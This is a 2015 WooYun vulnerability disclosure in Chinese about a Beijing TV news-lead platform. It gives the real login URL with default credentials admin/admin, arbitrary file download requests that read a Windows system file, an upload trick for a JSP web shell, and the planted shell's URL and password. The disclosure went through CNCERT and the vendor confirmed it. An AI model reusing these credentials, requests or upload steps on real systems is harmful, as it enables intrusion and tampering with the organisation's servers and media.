当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120660

漏洞标题:北京电视台某系统从弱口令到Getshell

相关厂商:北京电视台

漏洞作者: 茜茜公主

提交时间:2015-06-15 18:31

修复时间:2015-08-03 17:14

公开时间:2015-08-03 17:14

漏洞类型:后台弱口令

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

弱口令到getshell

详细说明:

BTV新闻线索云平台
http://yun.btvtech.com/tpp/rest/login.html;JSESSIONID=2dc18ff99da48dee7c9ef2017171f9ed
帐号admin,密码admin

QQ截图20150602111646.jpg


在这个系统里又牵扯到BTV的资源库某服务器存在任意文件下载

QQ截图20150602112012.jpg


http://yun.btvtech.com/tpp/rest/o/download.json?filepath=http://27.112.87.228:80/Y:/体育FTP素材入线索库/Low/2015-06-01/010615050-shara-post-uncut-1_14331653191.mp4


关键在这里

http://27.112.87.228:80


能这样http://27.112.87.228/C:/Windows/system.ini


QQ截图20150602112309.jpg


醉了
该系统功能很全,能对新闻线索进行送审

QQ截图20150602112639.jpg


QQ截图20150602112719.jpg


点击电视搜索,将跳转到天脉云

QQ截图20150615155533.jpg


http://www.tvmcloud.com/Home/Index/index

QQ截图20150615155943.jpg


QQ截图20150615161318.jpg


系统太高端

QQ截图20150615161517.jpg


点击更多搜索,会跳转到http://cloud.btvtech.com/search.htm

QQ截图20150615161702.jpg


QQ截图20150615164651.jpg

漏洞证明:

回到线索库那个系统
在页面右侧有一个展开

QQ截图20150615165018.jpg


此处可以通过抓包改后缀的方式上传jspshell

QQ截图20150615165102.jpg


QQ截图20150615165436.jpg


一句话地址:http://yun.btvtech.com:80/tpp/static/uploads/images/1434358816099[B@41c8a254.jsp
密码:woo9yun

QQ截图20150615165637.jpg


QQ截图20150615165740.jpg


QQ截图20150615165906.jpg


QQ截图20150615165922.jpg


可以替换视频源文件,干一番大事业了

修复方案:

强口令

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-19 17:12

厂商回复:

最新状态:

暂无